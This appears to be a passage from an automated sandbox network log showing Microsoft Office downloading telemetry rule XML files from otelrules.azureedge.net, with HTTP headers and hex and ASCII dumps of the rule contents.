                                                                                                      2024-10-08 18:51:26 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      39192.168.2.74974613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:26 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:26 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:26 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 400
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                      x-ms-request-id: 53f69819-801e-0048-7802-17f3fb000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185126Z-1657d5bbd48wd55zet5pcra0cg0000000570000000014bfu
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:26 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      40192.168.2.74974513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:26 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:26 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:26 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 468
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                      x-ms-request-id: db28b7eb-d01e-0065-5efe-16b77a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185126Z-1657d5bbd48jwrqbupe3ktsx9w00000005p0000000004qar
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      41192.168.2.74974413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:26 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:26 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:26 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 404
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                      x-ms-request-id: 151ca1e1-401e-0029-2b03-179b43000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185126Z-1657d5bbd48gqrfwecymhhbfm8000000046g00000000ghxs
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:26 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      42192.168.2.74974713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:26 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:26 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:26 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 479
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                      x-ms-request-id: b2c548d6-d01e-0082-4f03-17e489000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185126Z-1657d5bbd48brl8we3nu8cxwgn00000005k00000000161f1
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:26 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      43192.168.2.74974913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:27 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:27 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:27 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 475
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                      x-ms-request-id: c5dbf9be-001e-0017-2cf1-160c3c000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185127Z-1657d5bbd48t66tjar5xuq22r8000000059000000000vvqf
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:27 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      44192.168.2.74975113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:27 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:27 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:27 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 491
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                      x-ms-request-id: 721d8bd8-801e-002a-4f00-1731dc000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185127Z-1657d5bbd48gqrfwecymhhbfm80000000430000000011r5h
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:27 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      45192.168.2.74975213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:27 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:27 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:27 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 416
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                      x-ms-request-id: 9e1fd194-201e-00aa-46dc-183928000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185127Z-1657d5bbd48sqtlf1huhzuwq70000000050g00000000yydy
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:27 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      46192.168.2.74975013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:27 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:27 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:27 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 448
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                      x-ms-request-id: 5e879109-c01e-00a2-3e73-172327000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185127Z-1657d5bbd48wd55zet5pcra0cg00000005bg00000000emd8
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:27 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      47192.168.2.74974813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:27 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:27 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:27 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 425
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                      x-ms-request-id: 7709e3c3-b01e-0097-5e02-174f33000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185127Z-1657d5bbd482tlqpvyz9e93p5400000005gg000000008a0v
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:27 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      48192.168.2.74975613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:28 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:28 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:28 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 471
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                      x-ms-request-id: 2f3972b1-401e-0035-1b02-1782d8000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185128Z-1657d5bbd48wd55zet5pcra0cg00000005e00000000034wr
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      49192.168.2.74975413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:28 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
